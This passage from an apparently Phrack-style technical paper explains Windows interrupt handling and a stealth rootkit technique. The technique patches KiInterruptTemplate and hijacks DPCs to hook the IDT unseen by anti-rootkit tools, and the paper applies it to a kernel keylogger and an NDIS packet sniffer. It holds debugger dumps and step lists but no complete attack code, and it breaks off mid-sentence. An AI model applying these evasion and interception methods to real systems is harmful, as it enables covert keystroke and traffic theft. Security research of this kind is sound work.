+examples of rootkit techniques on rootkit.com.
+
+Finally, this part would not be complete if we don't speak about anti-rk. 
+The most famous is Rk Unhooker by MP_ART & EP_X0FF and their team UG North.
+Others anti-rk are DarkSpy [15] by CardMagic, IceSword [16] by pjf and 
+Gmer [17].
+
+----[ 1.2 - About kernel level protections
+
+When we talk about protection, we must notice where the protection takes
+place into the system. A protection has an advantage on an attack only 
+if it operates from a higher level. Protections like PaX or Exec Shield 
+are efficient because they protecting userland from kernel.
+
+Protections like PatchGuard and other HIPS also protect the system 
+integrity but as far as an attacker can find a way to attack those 
+protections at their own level they will be useless. A protection is 
+reliable only if it can't be corrupted by an attacker. Assuming an 
+attacker find a way to inject code into the protection and you can 
+consider that your b0x is dead.
+
+That's why PatchGuard isn't so efficient [18]. But we know that disabling
+or destroying a protection is very noisy. No, the best way is to fly under 
+the radar by working with special objects and events that cannot be 
+checked because of their volatility.
+
+In June 2006, Greg Hoglund presented the concept of KOH (Kernel Object 
+Hooking) [19]. A new way of detouring code execution, you don't have to 
+modify static code section but rather you work on dynamic allocated 
+structures/codes like DPC (Deferred Procedure Calls). For protections,
+it's hard to find and verify those areas due to their instabilities. 
+
+Others cool objects are IRP. They are the object used by the Windows 
+kernel I/O manager to communicate with devices. Each I/O operation on 
+hardware generates an IRP, sycalls send IRP to a driver through his 
+device. In general a driver owns several devices; one of them is used to 
+communique with the userland by using IOCTL and others devices are 
+managing IRP by filtering them or performing a requested task. 
+IRP are sent to a driver using its MajorFunctions table. This table 
+includes the different functionalities provided by the driver. You can 
+check the result returned by a MajorFunction by installing a completion 
+routine on an IRP. They are very volatile objects; controlling and 
+checking them is very hard. 
+
+In fact, if you want to check everything you would need to completely 
+redesign operating system architecture. So keep in mind that protection 
+cannot be everywhere at every time and we will demonstrate it in the 
+following parts.
+
+----[ 1.3 - Concept key: use kernel code against itself
+
+The idea behind this paper is exploiting kernel code. Exploitation is 
+possible because input defines code behavior. Submitting a crafted input 
+to a vulnerable software can leads into code execution. Dangerous input is
+of course defined by your target. Kernel space contains more exploitation 
+scenarios because you can change its environment. A rootkit can not 
+change basic inputs as arguments. But it can change the environment around 
+a code. Heap exploitation techniques such as unlinking is a perfect 
+example. By changing a memory block structure, you are able to overwrite 
+4 bytes. Some techniques can even change next allocated block address [20].
+It does work because a program trusts those information. In kernel, you 
+have a total control on the environment. Also completely checking the 
+kernel is bad for performance and totally impossible.
+
+Changing code environment has been used successfully for the phide2 
+rootkit [21] technique. This rootkit can hide threads without hooking 
+Windows scheduler which is impressive. As it relies on code behavior, it 
+needs strong reverse knowledge. It extends this concept into unknown 
+operating system behaviors. Generic protections are based on generic 
+assumptions. Such as checking only driver images for code hooks. These 
+days operating systems design is against those protections and requires 
+advanced software rootkit techniques.
+
+---[ 2 - Introducing stealth hooking on IDT
+
+Let's introduce our concept about stealth hooking with an example based on 
+IDT. First we will see what is the IDT and its purpose. Then we will 
+discuss about hardware interrupts and how Windows deals with them. 
+
+IDT (Interrupt Descriptor Table) is a CPU specific linear table localized 
+in kernel-land. IDT can be read with ring3 privilege level but you must
+have ring0 privilege if you want to write into it. IDT is composed of 256 
+entries of KIDTENTRY structures and you can use the Kernel Debugger (KD) 
+included into the Debugging Tools for Windows [22] to see the definition
+of an IDT entry.
+
+kd> dt nt!_KIDTENTRY
+   +0x000 Offset           : Uint2B
+   +0x002 Selector         : Uint2B
+   +0x004 Access           : Uint2B
+   +0x006 ExtendedOffset   : Uint2B
+
+Here we don't want to (re)explain the architecture of the IDT so we advise
+you to read Kad's paper published in Phrack 59 about IDT and about how it 
+works [23].
+
+The first 32 entries of IDT are reserved by the CPU for exceptions. Others
+are use to handle hardware interrupts and special system events.
+
+Here is a dump of the first 64 entries of the Windows' IDT.
+ 
+kd> !idt -a
+Dumping IDT:
+
+00: 804df350 nt!KiTrap00
+01: 804df4cb nt!KiTrap01
+02: Task Selector = 0x0058
+03: 804df89d nt!KiTrap03
+04: 804dfa20 nt!KiTrap04
+05: 804dfb81 nt!KiTrap05
+06: 804dfd02 nt!KiTrap06
+07: 804e036a nt!KiTrap07
+08: Task Selector = 0x0050
+09: 804e078f nt!KiTrap09
+0a: 804e08ac nt!KiTrap0A
+0b: 804e09e9 nt!KiTrap0B
+0c: 804e0c42 nt!KiTrap0C
+0d: 804e0f38 nt!KiTrap0D
+0e: 804e164f nt!KiTrap0E
+0f: 804e197c nt!KiTrap0F
+10: 804e1a99 nt!KiTrap10
+11: 804e1bce nt!KiTrap11
+12: 804e197c nt!KiTrap0F
+13: 804e1d34 nt!KiTrap13
+14: 804e197c nt!KiTrap0F
+15: 804e197c nt!KiTrap0F
+16: 804e197c nt!KiTrap0F
+17: 804e197c nt!KiTrap0F
+18: 804e197c nt!KiTrap0F
+19: 804e197c nt!KiTrap0F
+1a: 804e197c nt!KiTrap0F
+1b: 804e197c nt!KiTrap0F
+1c: 804e197c nt!KiTrap0F
+1d: 804e197c nt!KiTrap0F
+1e: 804e197c nt!KiTrap0F
+1f: 804e197c nt!KiTrap0F
+
+20: 00000000 
+21: 00000000 
+22: 00000000 
+23: 00000000 
+24: 00000000 
+25: 00000000 
+26: 00000000 
+27: 00000000 
+28: 00000000 
+29: 00000000 
+2a: 804deb92 nt!KiGetTickCount
+2b: 804dec95 nt!KiCallbackReturn
+2c: 804dee34 nt!KiSetLowWaitHighThread
+2d: 804df77c nt!KiDebugService
+2e: 804de631 nt!KiSystemService
+2f: 804e197c nt!KiTrap0F
+30: 806f3d48 hal!HalpClockInterrupt
+31: 80dd816c i8042prt!I8042KeyboardInterruptService (KINTERRUPT 80dd8130)
+32: 804ddd04 nt!KiUnexpectedInterrupt2
+33: 80dd3224 serial!SerialCIsrSw (KINTERRUPT 80dd31e8)
+34: 804ddd18 nt!KiUnexpectedInterrupt4
+35: 804ddd22 nt!KiUnexpectedInterrupt5
+36: 804ddd2c nt!KiUnexpectedInterrupt6
+37: 804ddd36 nt!KiUnexpectedInterrupt7
+38: 806edef0 hal!HalpProfileInterrupt
+39: 80f0827c ACPI!ACPIInterruptServiceRoutine (KINTERRUPT 80f08240)
+3a: 80dc67cc vmsrvc+0x1C16 (KINTERRUPT 80dc6790)
+3b: 80df6414 NDIS!ndisMIsr (KINTERRUPT 80df63d8)
+3c: 80de040c i8042prt!I8042MouseInterruptService (KINTERRUPT 80de03d0)
+3d: 804ddd72 nt!KiUnexpectedInterrupt13
+3e: 80ed78a4 atapi!IdePortInterrupt (KINTERRUPT 80ed7868)
+3f: 80f01dd4 atapi!IdePortInterrupt (KINTERRUPT 80f01d98)
+40: 804ddd90 nt!KiUnexpectedInterrupt16
+[...]
+
+This dump represents a typical Windows IDT, you can see the IDT entries 
+index followed by the address of the handler and this name. The first 32 
+entries are filled by KiTrap* functions that manage exceptions. The rest 
+of the table is left to the system, you can see specials system interrupts 
+like KiSystemService and KiCallbackReturn and handlers used by drivers 
+like I8042KeyboardInterruptService or I8042MouseInterruptService.
+
+----[ 2.1 - How Windows manage hardware interrupts 
+
+When we talk about interrupts we must introduce the concept of IRQL 
+(Interrupt ReQuest Level). The kernel represents IRQLs internally as a 
+number from 0 through 31 on x86 with higher numbers representing higher 
+priority interrupts. Although the kernel defines the standard set of IRQLs 
+for software interrupts, the HAL (Hardware Abstraction Layer) maps 
+hardware interrupt numbers to the IRQLs.
+
+   +----------------+
+31 |    Highests    | \
+to |    IRQLs       | | Clock, system failure.
+27 |                | /
+   +----------------+
+26 |                | \
+to |  DEVICE_IRQL   | | Hardware interrupts.          
+3  |                | /
+   +----------------+
+2  | DISPATCH_LEVEL | Scheduler, DPC.
+   +----------------+ 
+1  |    APC_LEVEL   | Used when dispatching APC.
+   +----------------+ 
+0  |  PASSIVE_LEVEL | Threads run at this IRQL. 
+   +----------------+    
+   
+Each processor has its own IRQL. You can have a core running at an IRQL=
+DISPATCH_LEVEL whereas another is running at PASSIVE_LEVEL. In fact IRQL
+represents the "mask ability" of the current running code. Interrupts from 
+a source with an IRQL above the current level interrupt the processor, 
+whereas interrupts from sources with IRQLs equal to or below the current 
+level are masked until an executing thread decrease the IRQL.
+
+Some system components are not accessible when code is running at 
+IRQL>=DISPATH_LEVEL. Accessing to paged memory (memory which can be 
+swapped on disk) is impossible and lots of kernel functions cannot be used.
+
+Hardware interrupts are asynchronous and reached by external peripherals. 
+For example when you hit a key, your keyboard device sends an IRQ 
+(Interrupt ReQuest) routed by the Southbridge [24] on your interrupt 
+controller through the Northbridge [25]. The Southbridge is a chip that can
+be described like a I/O controller hub. This chip receives all the I/O 
+externals interrupt and send them to the Northbridge. The Northbridge is
+directly connected to your memory and high speed graphic bus also to your 
+CPU. This chip is also known as the memory controller hub.
+
+On most x86 systems we find a chipset called i82489, Advanced Programmable 
+Interrupt Controller (APIC). The APIC is composed by 2 main components, a 
+I/O APIC, one per CPU, and a LAPIC (Local APIC) on each core. I/O APIC 
+uses a routing algorithm to dispatch an interrupt on the best adapted core.
+According to the principle of locality, I/O APIC will deliver the device 
+interrupt on the core which handled it the previous time [26].
+
+After this LAPIC translates the IRQ to an 8-bits value, an interrupt 
+vector. This interrupt vector represents IDT's entry index associated with 
+the handler. When the core is ready to handle the interrupt, its 
+instruction flow is redirected on the IDT entry. 
+
+   IDT            IDT            IDT           IDT 
+    1              2              3             4 
+  +---+          +---+          +---+         +---+         
+  |   |          |   |          |   |         |   |
+  |---|          |---|          |---|         |---|
+  |   |          |   |          |   |         |   |
+  |---|          |---|          |---|         |---|
+  |   |          |   |          |   |         |   |
+  +---+          +---+          +---+         +---+    
+    |              |              |             |
++--------+     +--------+     +--------+    +--------+
+|        |     |        |     |        |    |        | 
+| core 1 |     | core 2 |     | core 3 |    | core 4 |
+|        |     |        |     |        |    |        |
++--------+     +--------+     +--------+    +--------+ 
+| LAPIC  |     | LAPIC  |     | LAPIC  |    | LAPIC  |
++---+----+     +---+----+     +---+----+    +---+----+
+    |              |              |             |   
+    |              |              |             |
+<---+--------------+------+-------+-------------+-----> 
+               Interrupt  |         Processor system bus
+                Messages  |
+                          |
+                          |
+    External       +------+------+
+    Interrupts     |             |
+    --------------->   I/O APIC  |  
+                   |             |
+                   +-------------+
+
+-----[ 2.3.1 Hardware interrupts dispatching on Windows                 
+                   
+On Windows, the interrupt handler isn't executed immediately, there is a 
+code template first. This template is implemented in the function 
+KiInterruptTemplate and does two things. First, it saves the current 
+core state in the stack and dispatches code flow to the right "interrupt 
+dispatcher".
+
+When a interrupt is raised, after the core status core is saved, code flow 
+is transferred to the interrupt handler as defined in the IDT. In fact 
+each interrupt handler in the IDT points to a KiInterruptTemplate 
+routine [27]. KiInterruptTemplate will call KiInterruptDispatch which 
+performs the following operations :
+
+- Acquire the service routine spinlock.
+
+- Raise IRQL to DEVICE_IRQL, the IRQL of a given interrupt vector is 
+calculated by subtracting the interrupt vector from 27d.
+
+- Call the interrupt handler, an ISR (Interrupt Service Routine).
+
+- Lower IRQL.
+
+- Release the service routine spinlock.
+
+For example, the keyboard device ISR is I8042KeyboardInterruptService. 
+ISR are routines for handling interrupts like top-halves in the linux 
+kernel. According to the WDK (Windows Driver Kit), the ISR must do 
+whatever is appropriate to the device to dismiss the interrupt. Then, it 
+should do only what is necessary to save stage and queue a DPC. It means it
+interruption management will take place on a lower IRQL than during ISR
+execution. The I/O processing is done into the DPC.
+
+DPC (Deferred Procedure Call) are equivalent of bottom-halves in linux. 
+DPC works at IRQL DISPATCH_LEVEL, lower than the ISR's IRQL. In fact the 
+ISR will queue a DPC to process the entire interrupt at a lower IRQL in 
+order to avoid the core preemption taking too much time. For the keyboard 
+the DPC is I8042KeyboardIsrDpc. Here a figure to sum up the interrupt 
+processing :
+
+                                              +-------------------------+
+Hardware Interrupt                       /----> Here we are at          |  
+       |                                 |    | IRQL=DEVICE_LEVEL       |
+       |                                 |    | The KiInterruptDispatch |
+       /---> IDT ---\                    |    | routine calls the ISR.  |
+                    |                    |    |                         |
+                    |                    |    | ISR handles interrupt   |
+            +-----------------------+    |    | and queue a DPC for     |
+            |  KiInterruptTemplate ------/    | later processing        |
+            +-----------------------+         |                         |
+                                              +-------------------------+
+                                              
+KiInterruptDispatch receives one main argument from KiInterruptTemplate, 
+a pointer to an interrupt object stored in the EDI register. Interrupt
+objects are defined by a KINTERRUPT structure :
+
+kd> dt nt!_KINTERRUPT
+   +0x000 Type             : Int2B
+   +0x002 Size             : Int2B
+   +0x004 InterruptListEntry : _LIST_ENTRY
+   +0x00c ServiceRoutine   : Ptr32     unsigned char 
+   +0x010 ServiceContext   : Ptr32 Void
+   +0x014 SpinLock         : Uint4B
+   +0x018 TickCount        : Uint4B
+   +0x01c ActualLock       : Ptr32 Uint4B
+   +0x020 DispatchAddress  : Ptr32     void 
+   +0x024 Vector           : Uint4B
+   +0x028 Irql             : UChar
+   +0x029 SynchronizeIrql  : UChar
+   +0x02a FloatingSave     : UChar
+   +0x02b Connected        : UChar
+   +0x02c Number           : Char
+   +0x02d ShareVector      : UChar
+   +0x030 Mode             : _KINTERRUPT_MODE
+   +0x034 ServiceCount     : Uint4B
+   +0x038 DispatchCount    : Uint4B
+   +0x03c DispatchCode     : [106] Uint4B
+
+We retrieve in this structure, the SpinLock and the ServiceRoutine. Notice 
+that SynchronizeIrql contains the IRQL when the ISR will be executed.
+
+For each entry in the IDT which handles a hardware interrupt, the 
+KiInterruptTemplate is contained in the DispatchCode table of the 
+KINTERRUPT structure. 
+ 
+For the keyboard device we have this KINTERRUPT :
+
+kd> dt nt!_KINTERRUPT 80dd8130
+   +0x000 Type             : 22
+   +0x002 Size             : 484
+   +0x004 InterruptListEntry : _LIST_ENTRY [ 0x80dd8134 - 0x80dd8134 ]
+   +0x00c ServiceRoutine   : 0xfa815495     unsigned char  
+   ->i8042prt!I8042KeyboardInterruptService+0
+   +0x010 ServiceContext   : 0x80e2ec88 
+   +0x014 SpinLock         : 0
+   +0x018 TickCount        : 0xffffffff
+   +0x01c ActualLock       : 0x80e2ed48  -> 0
+   +0x020 DispatchAddress  : 0x804da8d8     void  nt!KiInterruptDispatch+0
+   +0x024 Vector           : 0x31
+   +0x028 Irql             : 0x1a ''
+   +0x029 SynchronizeIrql  : 0x1a ''
+   +0x02a FloatingSave     : 0 ''
+   +0x02b Connected        : 0x1 ''
+   +0x02c Number           : 0 ''
+   +0x02d ShareVector      : 0 ''
+   +0x030 Mode             : 1 ( Latched )
+   +0x034 ServiceCount     : 0
+   +0x038 DispatchCount    : 0xffffffff
+   +0x03c DispatchCode     : [106] 0x56535554
+
+Let's have a look at the beginning of KiInterruptTemplate :
+
+nt!KiInterruptTemplate:
+804da972 54              push    esp
+804da973 55              push    ebp
+804da974 53              push    ebx
+804da975 56              push    esi
+804da976 57              push    edi
+804da977 83ec54          sub     esp,54h
+804da97a 8bec            mov     ebp,esp
+804da97c 89442444        mov     dword ptr [esp+44h],eax
+804da980 894c2440        mov     dword ptr [esp+40h],ecx
+804da984 8954243c        mov     dword ptr [esp+3Ch],edx
+804da988 f744247000000200 test    dword ptr [esp+70h],20000h
+804da990 0f852a010000    jne     nt!V86_kit_a (804daac0)
+804da996 66837c246c08    cmp     word ptr [esp+6Ch],8
+804da99c 7423            je      nt!KiInterruptTemplate+0x4f (804da9c1)
+804da99e 8c642450        mov     word ptr [esp+50h],fs
+804da9a2 8c5c2438        mov     word ptr [esp+38h],ds
+804da9a6 8c442434        mov     word ptr [esp+34h],es
+804da9aa 8c6c2430        mov     word ptr [esp+30h],gs
+804da9ae bb30000000      mov     ebx,30h
+804da9b3 b823000000      mov     eax,23h
+804da9b8 668ee3          mov     fs,bx
+804da9bb 668ed8          mov     ds,ax
+804da9be 668ec0          mov     es,ax
+804da9c1 648b1d00000000  mov     ebx,dword ptr fs:[0]
+804da9c8 64c70500000000ffffffff mov dword ptr fs:[0],0FFFFFFFFh
+804da9d3 895c244c        mov     dword ptr [esp+4Ch],ebx
+804da9d7 81fc00000100    cmp     esp,10000h
+804da9dd 0f82b5000000    jb      nt!Abios_kit_a (804daa98)
+804da9e3 c744246400000000 mov     dword ptr [esp+64h],0
+804da9eb fc              cld
+804da9ec 8b5d60          mov     ebx,dword ptr [ebp+60h]
+804da9ef 8b7d68          mov     edi,dword ptr [ebp+68h]
+804da9f2 89550c          mov     dword ptr [ebp+0Ch],edx
+804da9f5 c74508000ddbba  mov     dword ptr [ebp+8],0BADB0D00h
+804da9fc 895d00          mov     dword ptr [ebp],ebx
+804da9ff 897d04          mov     dword ptr [ebp+4],edi
+804daa02 f60550f0dfffff  test    byte ptr ds:[0FFDFF050h],0FFh
+804daa09 750d            jne     nt!Dr_kit_a (804daa18)
+
+nt!KiInterruptTemplate2ndDispatch:
+804daa0b bf00000000      mov     edi,0
+nt!KiInterruptTemplateObject:
+804daa10 e9c3fcffff      jmp     nt!KeSynchronizeExecution+0x2 (804da6d8)
+[...]
+
+Remember, this code is unique for each KINTERRUPT. We said before that 
+KiInterruptDispatch receives its arguments from the EDI register (a 
+pointer to the KINTERRUPT of the interrupt). In the KiInterruptTemplate 
+we can see this little code :
+
+[...] 
+nt!KiInterruptTemplate2ndDispatch:
+804daa0b bf00000000      mov     edi,0
+nt!KiInterruptTemplateObject:
+804daa10 e9c3fcffff      jmp     nt!KeSynchronizeExecution+0x2 (804da6d8)
+[...] 
+
+Here we have a mov "edi, 0" and a jmp, but if we look at the 
+KiInterruptTemplate code contained in the keyboard's KINTERRUPT we have :
+
+ffb72525 bf5024b7ff      mov     edi,0FFB72450h ; Keyboard KINTERRUPT
+ffb7252a e9a9839680      jmp     nt!KiInterruptDispatch (804da8d8)
+
+Wow, instructions are modified! The kernel will dynamically changes those 
+2 instructions in the KiInterruptTemplate code. In EDI we find the 
+KINTERRUPT object and the jmp branch on KiInterruptDispatch.
+
+Why this implementation ? Because we can easily change the dispatch 
+handler. Even if we often have the KiInterruptDispatch we can find 
+KiFloatingDispatch or KiChainDispatch. KiChainedDispatch is for vectors 
+shared among multiple interrupt objects and KiFloatingDispatch is like 
+KiInterruptDispatch, but it saves the floating core state too. 
+
+Windows provides APIs for connecting interrupts on IDT. IoConnectInterrupt 
+and IoConnectInterruptEx, according to the WDK :
+
+NTSTATUS 
+  IoConnectInterrupt(
+    OUT PKINTERRUPT  *InterruptObject,
+    IN PKSERVICE_ROUTINE  ServiceRoutine,
+    IN PVOID  ServiceContext,
+    IN PKSPIN_LOCK  SpinLock  OPTIONAL,
+    IN ULONG  Vector,
+    IN KIRQL  Irql,
+    IN KIRQL  SynchronizeIrql,
+    IN KINTERRUPT_MODE    InterruptMode,
+    IN BOOLEAN  ShareVector,
+    IN KAFFINITY  ProcessorEnableMask,
+    IN BOOLEAN  FloatingSave
+    );
+
+As you can see IoConnectInterrupt returns in the InterruptObject parameter 
+a KINTERRUPT structure, the same that we retrieve in the IDT. Previously
+you have seen in the KiInterruptTemplate two labels, 
+KiInterruptTemplateObject and KiInterruptTemplate2ndDispatch. Those two 
+labels are used by kernel function to find the two instructions in the 
+KiInterruptTemplateRoutine. KeInitializeInterrupt uses the
+KiInterruptTemplateObject label to update the "jmp Ki*Dispatch" and the
+KiConnectVectorAndInterruptObject function uses 
+KiInterruptTemplate2ndDispatch to modify the "mov edi, <&Kinterrupt>".
+
+-----[ 2.3.2 Hooking hardware IDT like a ninja 
+
+Now, think about this. We want to hook the IDT in a stealth way, we know 
+that replacing an entry directly is not the best solution. Anti-rooktits 
+don't check the dynamically allocated KiInterruptTemplate routine. So we 
+can modify this routine as we wish. There are three possible ways :
+
+- Redirect the "jmp Ki*Dispatch" on our dispatch routine, we have to code 
+our dispatch routine, not so hard. 
+
+- Change the kinterrupt address passed in EDI by the instruction 
+"mov edi, <&Kinterrupt>". The new KINTERRUPT will be the same than the 
+previous one, only the ServiceRoutine will be modified by us.    
+
+- Create our own KiInterruptTemplate, hard ...
+
+In this paper, we choosed the simplest way. We change the 
+"mov edi, <&kinterrupt>" by a "mov edi, <&OurKinterrupt>" and we implement 
+our ServiceRoutine. We know that this instruction is followed by a jmp, so 
+with a disassembly engine we can retrieve the instruction before the jmp
+nt!KiInterruptDispatch and modify it. We must keep in mind, when the 
+ServiceRoutine is running, the interrupt is not handled yet and we are 
+running at DEVICE_IRQL IRQL. This is not a fair situation, because a 
+lot of Windows kernel functions are not accessible. We know, that most 
+ISR queued a DPC, so after the ISR has been executed, the last entry in 
+the current core DPC queue should contain the DPC routine of our interrupt.
+
+If we want to access data generated by the interrupt we must proceed like 
+the ISR. Replacing the original ISR by our own ISR handler is very hard, 
+because it depends too much on the hardware device. But we know that the 
+real I/O is done by the DPC, so when KiInterruptTemplate will call our 
+ServiceRoutine, first we call the original ServiceRoutine and we modify 
+the last DPC entry by our. 
+
+DPC are represented by KDPC structures :
+
+kd> dt nt!_KDPC
+   +0x000 Type             : Int2B
+   +0x002 Number           : UChar
+   +0x003 Importance       : UChar
+   +0x004 DpcListEntry     : _LIST_ENTRY
+   +0x00c DeferredRoutine  : Ptr32     void 
+   +0x010 DeferredContext  : Ptr32 Void
+   +0x014 SystemArgument1  : Ptr32 Void
+   +0x018 SystemArgument2  : Ptr32 Void
+   +0x01c Lock             : Ptr32 Uint4B
+
+DPC list can be found in the KPRCB (Kernel Processor Control Region Block)
+structure of the current processor. KPRCB is preceded by a KPCR (Kernel 
+Processor Control Block) structure which is located at FS:[0x1C] on the 
+current processor. KPRCB is a 0x120 bytes from the beginning of the KPCR 
+structure.
+
+dt nt!_KPRCB
+[...]
+   +0x860 DpcListHead      : _LIST_ENTRY
+   +0x868 DpcStack         : Ptr32 Void ; DPC arguments
+   +0x86c DpcCount         : Uint4B ; DPC core counter
+   +0x870 DpcQueueDepth    : Uint4B ; Numbers of DPC in the list
+   +0x874 DpcRoutineActive : Uint4B
+   +0x878 DpcInterruptRequested : Uint4B
+   +0x87c DpcLastCount     : Uint4B
+   +0x880 DpcRequestRate   : Uint4B
+   +0x884 MaximumDpcQueueDepth : Uint4B
+   +0x888 MinimumDpcRate   : Uint4B
+
+Now we know how to retrieve the DPC of our interrupt, we can easily 
+change it to our own and handle the data.
+   
+For the keyboard the DPC is queued by KeInsertQueueDpc in the 
+I8xQueueCurrentKeyboardInput routine called by the keyboard's ISR.
+ 
+kd> dt nt!_KDPC 80e3461c
++0x000 Type             : 19 ; 19=DpcObject
++0x002 Number           : 0 ''
++0x003 Importance       : 0x1 ''
++0x004 DpcListEntry     : _LIST_ENTRY [ 0xffdff980 - 0x80559684 ]
++0x00c DeferredRoutine  : 0xfa815650    void  i8042prt!I8042KeyboardIsrDpc
++0x010 DeferredContext  : 0x80e343b8 
++0x014 SystemArgument1  : (null) 
++0x018 SystemArgument2  : (null) 
++0x01c Lock             : 0xffdff9c0  -> 0
+
+Here is the figure of the attack :
+
+                                            MyKinterrupt structure
+                                            +---------------------+
+Hardware Interrupt                     /---->  MyServiceRoutine   |
+       |                               |    |  Calls the original |
+       |                               |    |  ISR             ------\
+       \---> IDT ---\                  |    |  And modify the DPC |  |  
+                    |                  |    |  queue.             |  |
+                    |                  |    +---------------------+  |
+            +---------------------+    |                             |
+            | KiInterruptTemplate -----/      Original Kinterrupt    |
+            +---------------------+         +---------------------+  |
+     Core                                   |                     |  |
++------------+                              |   ServiceRoutine <-----/
+|            |                              | Queues the ISR's DPC|
+|DpcListHead |--\                           +---------------------+       
+|            |  |
++------------+  |
+                | +-----+     +-----+     +-----+     +-----+
+                \-> DPC |---->| DPC |---->| DPC |---->| DPC |-->DpcListHead
+   DpcListHead<---|     |<----|     |<----|     |<----|     |
+                  +-----+     +-----+     +-----+     +-----+  
+                                                        /\     
+                                                        ||
+                                                  Last DPC entry
+                                                  Modified after the call
+                                                  to the ServiceRoutine.
+ 
+-----[ 2.3.3 - Application 1 : Kernel keylogger 
+
+It's time to design a POC. In this sample we will see how to sniff 
+keyboard keystrokes. As you see previously, we are now able to control the
+DPC generated by an interrupt. For the keyboard we will hijack the 
+I8042KeyboardIsrDpc routine which is set into the DPC's keyboard 
+interruption. With our own DPC handler we will reproduce the behavior of 
+the original routine, unfortunately this kind of routine is hard to write 
+so we ripped some pieces of codes and used reversing techniques (notice the
+lazy hacker style).
+
+In our DPC handler we must call the KeyboardClassServiceCallback [28] 
+routine, this routine is provided by the Kbdclass driver. This callback 
+transfers input data buffer of a device to the class data queue. A function
+keyboard driver must calls this class service callback in its DPC routine.
+Here is the KeyboardClassServiceCallback's prototype :
+
+VOID
+  KeyboardClassServiceCallback (
+    IN PDEVICE_OBJECT  DeviceObject,
+    IN PKEYBOARD_INPUT_DATA  InputDataStart,
+    IN PKEYBOARD_INPUT_DATA  InputDataEnd,
+    IN OUT PULONG  InputDataConsumed
+    );
+
+Parameters :
+    DeviceObject : Pointer to the class device object. 
+    
+    InputDataStart : Pointer to the first keyboard input data packet in 
+    the input data buffer of the port device.
+    
+    InputDataEnd : Pointer to the keyboard input data packet that 
+    immediately follows the last data packet in the input data buffer of 
+    the port device.
+ 
+    InputDataConsumed : Pointer to the number of keyboard input data 
+    packets that are transferred by the routine.    
+    
+KEYBOARD_INPUT_DATA is defined by :
+
+typedef struct _KEYBOARD_INPUT_DATA {
+  USHORT  UnitId;
+  USHORT  MakeCode;
+  USHORT  Flags;
+  USHORT  Reserved;
+  ULONG  ExtraInformation;
+} KEYBOARD_INPUT_DATA, *PKEYBOARD_INPUT_DATA;
+
+So in our DPC handler we just have to check the MakeCode member of the set
+of KEYBOARD_INPUT_DATA structures. The MakeCode (or scancode) represents 
+the data sent by the keyboard to the system when you hit or release a 
+key, each key has it's own scancode and the system usually translates the 
+scancode into a character depending on you code page. For example the 
+scancode 19d on classical US keyboard is translated into the keycode 'e'.
+
+In order to know if CAPSLOCK is activated we send an IOCTL to the 
+functional keyboard device but we can only send IOCTL at a PASSIVE_LEVEL
+IRQL. For that we use a system thread which will sent IOCTL with the 
+kernel API IoBuildDeviceIoControlRequest. In fact the scancodes are queued 
+in a list locked by a spinlock and thread synchronized with a semaphore. 
+The thread is listening to incoming keystrokes then converts scancodes into
+keycodes. Like the kernel keylogger Klog does [29]. 
+
+-----[ 2.3.4 - Application 2 : NDIS packet sniffer 
+
+In the same way, an interrupt is raised when your network card receives 
+a packet. When this kind of interrupt is raised NDIS ISR handler 
+(ndisMIsr) routine launches the miniport ISR interrupt handler. The 
+ndisMIsr routine is used as a wrapper for miniport ISR and DPC. You can 
+see in the IDT the following entry : 
+
+3b: 80df6414 NDIS!ndisMIsr (KINTERRUPT 80df63d8) 
+
+It means, your ISR handler is not called directly when an interrupt 
+occurs, it is the ndisMIsr routine. Miniport's ISR is called by ndisMIsr 
+and the miniport DPC is also queued in this routine. The DPC queued is 
+the ndisMDpc routine which wraps your own DPC miniport handler. Finally 
+NDIS wraps all the interrupt process with ndisMIsr and ndisMDpc routines on
+Windows XP with NDIS 5.1. We don't know if this implementation is still 
+present on Windows Vista with NDIS 6.0.
+
+We know we can hijack the ndisMDpc handler by our own handler. With NDIS
+we will proceed in the same way but we will not hook the MiniportDpc 
+routine but directly hook the ndisMDpc routine. Why? Because we know that 
+ndisMDpc wraps the MiniportDpc routine and in fact MiniportDpc depends too
+much on the hardware of the miniport device. Each miniport device is 
+represented by an NDIS_MINIPORT_BLOCK [30] structure, in this structure
+we find a reference to a NDIS_MINIPORT_INTERRUP structure, which looks 
+like :
+
+kd> dt ndis!_NDIS_MINIPORT_INTERRUPT
+   +0x000 InterruptObject  : Ptr32 _KINTERRUPT
+   +0x004 DpcCountLock     : Uint4B
+   +0x008 Reserved         : Ptr32 Void
+   +0x00c MiniportIsr      : Ptr32 Void 
+   +0x010 MiniportDpc      : Ptr32 Void 
+   +0x014 InterruptDpc     : _KDPC
+   +0x034 Miniport         : Ptr32 _NDIS_MINIPORT_BLOCK
+   +0x038 DpcCount         : UChar
+   +0x039 Filler1          : UChar
+   +0x03c DpcsCompletedEvent : _KEVENT
+   +0x04c SharedInterrupt  : UChar
+   +0x04d IsrRequested     : UChar
+
+If we look at the ndisMDpc routine we notice that only the first parameter
+is used and this parameter refers to a NDIS_MINIPORT_INTERRUPT structure.
+The ndisMDpc function will call the MiniportDpc field of this structure. 
+We just have to hijack this pointer by our routine in order to control the 
+incoming packets on the system.
+
+The NDIS documentation specifies that a miniport DPC routine must 
+notify the bound protocol driver that an that an array of received 
+packets is available by calling the NdisMIndicateReceivePacket function
+[31].
+
+VOID
+  NdisMIndicateReceivePacket(
+    IN NDIS_HANDLE  MiniportAdapterHandle,
+    IN PPNDIS_PACKET  ReceivePackets,
+    IN UINT  NumberOfPackets
+    ); 
+
+In the ndis.h header we have :
+#define NdisMIndicateReceivePacket(_H, _P, _N)              \
+{                                                           \
+    (*((PNDIS_MINIPORT_BLOCK)(_H))->PacketIndicateHandler)( \
+                        _H,                                 \
+                        _P,                                 \
+                        _N);                                \
+}
+
+So in our MiniportDpc routine we will hihjack the PacketIndicateHandler, 
+which is often the ethFilterDprIndicateReceivePacket routine in the 
+NDIS_MINIPORT_BLOCK structure, in order to filter the incoming packets on 
+the miniport. After we have hijacked this pointer we call the original 
+MiniportDpc routine that will process everything. After that, we restore 
+the PacketIndicateHandler handler in the NDIS_MINIPORT_BLOCK for stealth
+reasons. To sum up we must :
+
+- Hijack the routine into the DPC queued by the ndisMIsr routine.
+
+- Now that we have hijacked the ndisMDpc we modify the 
+PacketIndicateHandler into the NDIS_MINIPORT_BLOCK of the miniport.
+
+- We call the ndisMDpc routine. It will call the original MiniportDpc 
+handler
+
+- The MiniportDpc routine calls the NdisMIndicateReceivePacket macro. Our
+filter function is called and we do our job.
+
+- When the ndisMDpc returns we restore the original PacketIndicateHandler 
+into the NDIS_MINIPORT_BLOCK of the miniport.
+
+With this filter, we can monitor or modify the incoming packets. For 
